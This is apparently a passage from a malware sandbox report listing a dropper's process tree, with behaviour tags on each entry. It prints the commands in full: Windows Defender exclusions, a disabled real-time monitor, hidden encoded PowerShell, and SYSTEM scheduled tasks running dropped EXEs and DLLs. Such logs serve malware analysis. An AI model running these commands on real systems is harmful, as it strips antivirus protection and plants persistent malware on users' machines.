C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\gLbKcqvTyliDAKYm\sqOGvVJo\RbrZgXRSszJxEWTc.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\gLbKcqvTyliDAKYm\sqOGvVJo\RbrZgXRSszJxEWTc.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oBeyQrPqBvPiiLVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oBeyQrPqBvPiiLVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oBeyQrPqBvPiiLVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oBeyQrPqBvPiiLVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gLbKcqvTyliDAKYm" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHdnmcxsX" /SC once /ST 09:09:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHdnmcxsX"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHdnmcxsX"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GSDaywQPJdyrKXMOz" /SC once /ST 00:43:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\XzkMenS.exe\" Y4 /SBPedidtn 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GSDaywQPJdyrKXMOz"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 6363⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\XzkMenS.exeC:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\XzkMenS.exe Y4 /SBPedidtn 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bGTnZQDECKwDuNSWyq"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ijLlchIpU\NoqaUQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "erLaEdTsgGebTau" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "erLaEdTsgGebTau2" /F /xml "C:\Program Files (x86)\ijLlchIpU\mFPtMGC.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "erLaEdTsgGebTau"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "erLaEdTsgGebTau"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JUjxRHGCKYRete" /F /xml "C:\Program Files (x86)\RFIumDCEBXXU2\JYhaqgA.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dHStwJHTntsRr2" /F /xml "C:\ProgramData\oBeyQrPqBvPiiLVB\lVsFHjl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FaHXLaniQBMEYVQSg2" /F /xml "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\abFxgvs.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AHXMxnWaJXPmSiNckSN2" /F /xml "C:\Program Files (x86)\AClHKqYMJaBBC\ynCWQkO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hijxFSKlICFAhziPp" /SC once /ST 20:21:51 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gLbKcqvTyliDAKYm\hUBYIJKz\MNsUfTj.dll\",#1 /GMWzdidotK 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hijxFSKlICFAhziPp"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GSDaywQPJdyrKXMOz"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 9563⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\nJvUBDN.exeC:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\nJvUBDN.exe FN /rVmdidZXJS 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gscJgxjKg" /SC once /ST 02:03:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gscJgxjKg"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gscJgxjKg"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
